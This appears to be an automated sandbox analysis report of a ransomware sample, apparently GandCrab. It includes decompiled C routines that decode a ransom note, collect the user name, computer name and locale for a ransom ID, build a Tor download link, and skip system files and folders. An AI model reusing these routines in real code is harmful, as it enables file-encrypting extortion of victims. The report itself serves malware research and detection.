                                        0x0fc64208
                                        0x0fc6420c
                                        0x0fc64286
                                        0x0fc6428d
                                        0x0fc64295
                                        0x0fc6429d
                                        0x0fc642a5
                                        0x0fc642ad
                                        0x0fc642b5
                                        0x0fc642bd
                                        0x0fc642c5
                                        0x0fc642cd
                                        0x0fc642d5
                                        0x0fc642dd
                                        0x0fc642e5
                                        0x0fc642ed
                                        0x0fc642f5
                                        0x0fc642fd
                                        0x0fc64305
                                        0x0fc6430d
                                        0x0fc64315
                                        0x0fc6431d
                                        0x0fc64325
                                        0x0fc6432d
                                        0x0fc64335
                                        0x0fc6433d
                                        0x0fc64345
                                        0x0fc6434d
                                        0x0fc64355
                                        0x0fc6435d
                                        0x0fc64365
                                        0x0fc6436d
                                        0x0fc64375
                                        0x0fc64385
                                        0x0fc6438b
                                        0x0fc64392
                                        0x0fc6439f
                                        0x0fc643a5
                                        0x0fc64392
                                        0x0fc643b6
                                        0x0fc643c3
                                        0x00000000
                                        0x0fc643c3
                                        0x0fc64210
                                        0x0fc64210
                                        0x0fc64212
                                        0x0fc64224
                                        0x0fc64228
                                        0x0fc6422d
                                        0x0fc64236
                                        0x00000000
                                        0x00000000
                                        0x0fc6423a
                                        0x0fc6423d
                                        0x0fc64243
                                        0x0fc64243
                                        0x0fc6424b
                                        0x00000000
                                        0x00000000
                                        0x0fc64250
                                        0x0fc64250
                                        0x0fc64256
                                        0x00000000
                                        0x00000000
                                        0x0fc64260
                                        0x0fc64262
                                        0x0fc6426d
                                        0x0fc64271
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64271
                                        0x0fc64264
                                        0x0fc6426b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc6426b
                                        0x0fc643ce
                                        0x00000000
                                        0x0fc64277
                                        0x0fc64277
                                        0x0fc64277
                                        0x0fc6427b
                                        0x0fc6427e
                                        0x0fc64281
                                        0x00000000
                                        0x0fc64243
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0FC639F0: GetProcessHeap.KERNEL32(?,?,0FC64637,00000000,?,00000000,00000000), ref: 0FC63A8C
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FC67357
                                          • Part of subcall function 0FC67330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FC67368
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FC67386
                                          • Part of subcall function 0FC67330: GetComputerNameW.KERNEL32 ref: 0FC67390
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC673B0
                                          • Part of subcall function 0FC67330: wsprintfW.USER32 ref: 0FC673F1
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC6740E
                                          • Part of subcall function 0FC67330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FC67432
                                          • Part of subcall function 0FC67330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FC64640,?), ref: 0FC67456
                                          • Part of subcall function 0FC67330: RegCloseKey.KERNEL32(00000000), ref: 0FC67472
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67192
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6719D
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671B3
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671BE
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671D4
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671DF
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671F5
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(0FC64966,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67200
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67216
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67221
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67237
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67242
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67261
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6726C
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64151
                                        • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64193
                                        • lstrcpyW.KERNEL32 ref: 0FC64212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64219
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4100118565-2385900546
                                        • Opcode ID: 4e6d006cfc9124285203149be49a33b150eb4873ffa39b8f947a8d3aa0d3b9fb
                                        • Instruction ID: b5049ef12cc31d12215e7cdb4e2e75c3b1f9799232186eefce083f97b09ee241
                                        • Opcode Fuzzy Hash: 4e6d006cfc9124285203149be49a33b150eb4873ffa39b8f947a8d3aa0d3b9fb
                                        • Instruction Fuzzy Hash: B271F4B01083419BE724DF14C88B77A7BE1FF80758F50491CF6855B292EBB99648CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC641D6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104stringmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC641D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xfc72000) =  *(_t41 + 0xfc72000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xfc72a64 = 0xfc72000;
				_t60 = E0FC68090(0xfc72000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xfc72000;
						_t49 =  *0xfc72000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xfc72000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xfc72a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0xfc72a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000);
				_t44 = E0FC67C10( &_a136);
				return _t44;
			}














                                        0x0fc641d6
                                        0x0fc641e0
                                        0x0fc641e0
                                        0x0fc641e7
                                        0x0fc641e8
                                        0x0fc641f4
                                        0x0fc64208
                                        0x0fc6420c
                                        0x0fc64210
                                        0x0fc64210
                                        0x0fc64212
                                        0x0fc64224
                                        0x0fc64228
                                        0x0fc6422d
                                        0x0fc64236
                                        0x00000000
                                        0x00000000
                                        0x0fc6423a
                                        0x0fc6423d
                                        0x0fc64243
                                        0x0fc64243
                                        0x0fc6424b
                                        0x00000000
                                        0x0fc64250
                                        0x0fc64250
                                        0x0fc64250
                                        0x0fc64256
                                        0x00000000
                                        0x00000000
                                        0x0fc64260
                                        0x0fc64262
                                        0x0fc6426d
                                        0x0fc64271
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64264
                                        0x0fc64264
                                        0x0fc6426b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc6426b
                                        0x00000000
                                        0x0fc64262
                                        0x0fc643ce
                                        0x00000000
                                        0x0fc643ce
                                        0x00000000
                                        0x0fc64277
                                        0x0fc64277
                                        0x0fc64277
                                        0x0fc6427b
                                        0x0fc6427e
                                        0x0fc64281
                                        0x00000000
                                        0x0fc64243
                                        0x0fc64210
                                        0x0fc64286
                                        0x0fc6428d
                                        0x0fc64295
                                        0x0fc6429d
                                        0x0fc642a5
                                        0x0fc642ad
                                        0x0fc642b5
                                        0x0fc642bd
                                        0x0fc642c5
                                        0x0fc642cd
                                        0x0fc642d5
                                        0x0fc642dd
                                        0x0fc642e5
                                        0x0fc642ed
                                        0x0fc642f5
                                        0x0fc642fd
                                        0x0fc64305
                                        0x0fc6430d
                                        0x0fc64315
                                        0x0fc6431d
                                        0x0fc64325
                                        0x0fc6432d
                                        0x0fc64335
                                        0x0fc6433d
                                        0x0fc64345
                                        0x0fc6434d
                                        0x0fc64355
                                        0x0fc6435d
                                        0x0fc64365
                                        0x0fc6436d
                                        0x0fc64375
                                        0x0fc64385
                                        0x0fc6438b
                                        0x0fc64392
                                        0x0fc6439f
                                        0x0fc643a5
                                        0x0fc64392
                                        0x0fc643b6
                                        0x0fc643c3
                                        0x0fc643cd

                                        APIs
                                        • lstrcpyW.KERNEL32 ref: 0FC64212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64219
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC64385
                                        • wsprintfW.USER32 ref: 0FC6439F
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC643B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4033391921-3341315666
                                        • Opcode ID: 860c1f44c8c048dfad4ffba729c77a8e0276a970c7cdbab15483bc1ae32c4eca
                                        • Instruction ID: e5ff3fb85d33349a38ae571ea40675c0b1bff8aa0eafeeadc6f5247a3cc59a92
                                        • Opcode Fuzzy Hash: 860c1f44c8c048dfad4ffba729c77a8e0276a970c7cdbab15483bc1ae32c4eca
                                        • Instruction Fuzzy Hash: 0141ACB010C341CBD724DF00D48A36ABFE2FF81759F50491CE6880B292DBBA9589CF62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66790 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0FC66790(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}










                                        0x0fc66799
                                        0x0fc6679c
                                        0x0fc667a1
                                        0x0fc667a3
                                        0x0fc667a6
                                        0x0fc667a9
                                        0x0fc667aa
                                        0x0fc667b0
                                        0x0fc667b0
                                        0x0fc667b3
                                        0x0fc667b4
                                        0x0fc667b0
                                        0x0fc667c4
                                        0x0fc667d1
                                        0x0fc667e6
                                        0x00000000
                                        0x0fc66830
                                        0x0fc66836
                                        0x0fc6683b
                                        0x0fc66840
                                        0x0fc66840
                                        0x0fc667d5
                                        0x0fc667d5
                                        0x0fc667db
                                        0x0fc667db

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0FC669A3), ref: 0FC6679C
                                        • lstrlenW.KERNEL32(00000000), ref: 0FC667A1
                                        • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0FC667CD
                                        • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0FC667E2
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0FC667EE
                                        • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0FC667FA
                                        • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0FC66806
                                        • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0FC66812
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0FC6681E
                                        • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0FC6682A
                                        • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0FC66836
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi$lstrlen
                                        • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                        • API String ID: 203586893-634406045
                                        • Opcode ID: 2c696bb5c9f3eaa4040f8bba95f3584df7eeaa61a0f6af41de8222a554fb7eba
                                        • Instruction ID: 656615464c6490533b688168c5bdcdeafe01c4c29269f3faf5039f3bab25e4cf
                                        • Opcode Fuzzy Hash: 2c696bb5c9f3eaa4040f8bba95f3584df7eeaa61a0f6af41de8222a554fb7eba
                                        • Instruction Fuzzy Hash: 5111A36220D73A255A202B79ECD3EEB15DD9D829A0B450539F500E6403EB85FB1297F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66640 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0FC66640(void* __ecx) {
				void* _t10;
				intOrPtr* _t21;
				void* _t45;
				void* _t46;

				_t46 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0FC68090(_t46, L"\\ProgramData\\") != 0 || E0FC68090(_t46, L"\\Program Files\\") != 0 || E0FC68090(_t46, L"\\Tor Browser\\") != 0 || E0FC68090(_t46, L"Ransomware") != 0 || E0FC68090(_t46, L"\\All Users\\") != 0 || E0FC68090(_t46, L"\\Local Settings\\") != 0) {
					L16:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t10 = E0FC68090(_t46, L":\\Windows\\");
					if(_t10 != 0) {
						goto L16;
					} else {
						_t21 = __imp__SHGetSpecialFolderPathW;
						_push(_t10);
						_push(0x2a);
						_push(_t45);
						_push(_t10);
						if( *_t21() == 0 || E0FC68090(_t46, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t21() == 0 || E0FC68090(_t46, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t21() == 0 || E0FC68090(_t46, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t21() == 0 || E0FC68090(_t46, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L16;
									}
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
						} else {
							goto L16;
						}
					}
				}
			}







                                        0x0fc66651
                                        0x0fc66660
                                        0x0fc66669
                                        0x0fc6676c
                                        0x0fc66775
                                        0x0fc66780
                                        0x0fc666d3
                                        0x0fc666da
                                        0x0fc666e1
                                        0x00000000
                                        0x0fc666e7
                                        0x0fc666e7
                                        0x0fc666ed
                                        0x0fc666ee
                                        0x0fc666f0
                                        0x0fc666f1
                                        0x0fc666f6
                                        0x0fc66705
                                        0x0fc66707
                                        0x0fc66709
                                        0x0fc6670a
                                        0x0fc66710
                                        0x0fc6671f
                                        0x0fc66721
                                        0x0fc66723
                                        0x0fc66724
                                        0x0fc6672a
                                        0x0fc66739
                                        0x0fc6673b
                                        0x0fc6673d
                                        0x0fc6673e
                                        0x0fc66744
                                        0x0fc66760
                                        0x0fc6676b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc666f6
                                        0x0fc666e1

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66653
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC666F2
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC6670C
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66726
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66740
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66760
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66775
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                        • String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                        • API String ID: 1363212851-2358141795
                                        • Opcode ID: be80f8eb1945e0b54ec8d3f028c1476ee28414d88b79f5002d604f5fdc1461d5
                                        • Instruction ID: 867926f60501708de26d5a9695f2b06fd28b95ad1ce53ce6968f0067c0ab3be6
                                        • Opcode Fuzzy Hash: be80f8eb1945e0b54ec8d3f028c1476ee28414d88b79f5002d604f5fdc1461d5
                                        • Instruction Fuzzy Hash: 5B312E3034C71122FD6426761EE7B2F648A8FC0E52F504415EB01EE2C3FE99E9016399
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC67140 Relevance: 20.1, APIs: 16, Instructions: 120stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0FC67140(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}























                                        0x0fc67140
                                        0x0fc67148
                                        0x0fc6714a
                                        0x0fc6714e
                                        0x0fc67153
                                        0x0fc67161
                                        0x0fc67164
                                        0x0fc67169
                                        0x0fc67169
                                        0x0fc6716f
                                        0x0fc67179
                                        0x0fc67180
                                        0x0fc67184
                                        0x0fc67187
                                        0x0fc67187
                                        0x0fc6718d
                                        0x0fc6719b
                                        0x0fc6719d
                                        0x0fc671a5
                                        0x0fc671a8
                                        0x0fc671a8
                                        0x0fc671ae
                                        0x0fc671bc
                                        0x0fc671be
                                        0x0fc671c6
                                        0x0fc671c9
                                        0x0fc671c9
                                        0x0fc671cf
                                        0x0fc671dd
                                        0x0fc671df
                                        0x0fc671e7
                                        0x0fc671ea
                                        0x0fc671ea
                                        0x0fc671f0
                                        0x0fc671fe
                                        0x0fc67200
                                        0x0fc67208
                                        0x0fc6720b
                                        0x0fc6720b
                                        0x0fc67211
                                        0x0fc6721f
                                        0x0fc67221
                                        0x0fc67229
                                        0x0fc6722c
                                        0x0fc6722c
                                        0x0fc67232
                                        0x0fc67240
                                        0x0fc67242
                                        0x0fc6724a
                                        0x0fc6724d
                                        0x0fc6724d
                                        0x0fc67253
                                        0x0fc67255
                                        0x0fc67255
                                        0x0fc6725c
                                        0x0fc6726a
                                        0x0fc6726c
                                        0x0fc67274
                                        0x0fc67277
                                        0x0fc67277
                                        0x0fc67280
                                        0x0fc672ac
                                        0x0fc67282
                                        0x0fc67288
                                        0x0fc672a6
                                        0x0fc672a6

                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67192
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6719D
